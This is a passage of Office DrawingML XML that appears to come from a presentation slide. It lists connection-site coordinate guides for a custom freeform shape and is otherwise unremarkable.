              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 144983 h 6858000"/>
